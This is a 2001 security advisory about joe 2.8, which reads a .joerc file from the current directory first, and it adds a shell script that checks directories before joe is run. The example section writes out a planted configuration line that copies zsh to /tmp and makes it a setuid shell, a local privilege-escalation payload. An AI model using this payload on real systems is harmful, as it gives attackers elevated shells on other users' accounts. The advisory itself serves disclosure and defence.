Joe's Own Editor File Handling Error

From: advisories@WKIT.COM
Date: Wed Feb 28 2001 - 15:13:42 CET

    WKIT SECURITY AB
     www.wkit.com

    TITLE: Joe's Own Editor File Handling Error
    ADVISORY ID: WSIR-01/02-02
    REFERENCE: http://www.wkit.com/advisories
    CVE: GENERIC-MAP-NOMATCH
    CREDIT: Christer Öberg, Wkit Security AB
    CONTACT: advisories@wkit.com
    CLASS: File Handling Error
    OBJECT: joe(1) (exec)
    VENDOR: Joseph H. Allen
    STATUS:
    REMOTE: No
    LOCAL: Yes
    VULNERABLE: Joseph Allen joe 2.8

    DATE
      CREATED: 26/02/2001
      LAST UPDATED:
      VENDOR CONTACT:
      RELEASE: 28/02/2001

    VULNERABILITY DESCRIPTION
      joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
      /usr/local/lib/joerc, in that order. Because ./.joerc is tried first,
      users could be tricked into executing commands if they open/edit a file
      with joe in a directory where other users can write.

    CONDITIONS
      User using joe in a world/group writable directory.

    EXAMPLE
      A user copies the default joerc file to a world-writable directory and
      changes
      :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
      to
      :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype
      Another user opens a file in that directory with joe and runs ispell with
      ^[l; the result is a suid shell in /tmp.
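
      A pre-flight check for the condition described above, as an added example
      that is not part of the original advisory. The function names joerc_risk
      and joe_guarded are hypothetical, and the check assumes POSIX ls, awk and id.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a directory before running joe.
# joe 2.8 reads ./.joerc first, so a .joerc owned or writable by someone else,
# or a directory where others could create one, is the risky condition.

# Print the permission string of a path (e.g. drwxrwxrwt), following symlinks.
perm_string() {
    ls -ldL -- "$1" | awk '{print $1}'
}

# Print the numeric uid that owns a path (the link itself, if it is a symlink).
owner_uid() {
    ls -ldn -- "$1" | awk '{print $3}'
}

# Succeed when a permission string has the group or other write bit set.
others_can_write() {
    case $1 in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# joerc_risk DIR: print safe, foreign-joerc, writable-joerc or writable-dir.
# Returns 0 only for "safe".
joerc_risk() {
    dir=${1:-.}
    rc="$dir/.joerc"
    if [ -e "$rc" ]; then
        if [ "$(owner_uid "$rc")" != "$(id -u)" ]; then
            echo foreign-joerc; return 1
        fi
        if others_can_write "$(perm_string "$rc")"; then
            echo writable-joerc; return 1
        fi
    fi
    # No hostile .joerc yet, but group/world write lets one be planted later.
    if others_can_write "$(perm_string "$dir")"; then
        echo writable-dir; return 1
    fi
    echo safe
}

# joe_guarded FILE...: run joe only when the current directory passes the check.
joe_guarded() {
    reason=$(joerc_risk .) || { echo "refusing to run joe here: $reason" >&2; return 1; }
    joe "$@"
}
```

      A sticky world-writable directory such as /tmp is still reported as
      writable-dir, because the sticky bit does not stop another user from
      creating a .joerc that does not yet exist.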

    SOLUTION/VENDOR INFORMATION/WORKAROUND

    DISCLAIMER
      The contents of this advisory may be distributed freely, provided that
      no fee is charged and proper credit is given. Wkit Security AB takes
      no credit for this discovery if someone else has published this
      information in the public domain before this advisory was released.
      The information herein is intended for educational purposes, not for
      malicious use. Wkit Security AB takes no responsibility whatsoever for
      the use of this information.

    ABOUT
      Wkit Security AB is an independent data security company working with
      security-related services and products.

      Wkit Security AB
      Upperudsv. 4
      S-464 72 Håverud
      SWEDEN
      http://www.wkit.com
      e-mail: advisories@wkit.com

    (C) 2001 WKIT SECURITY AB


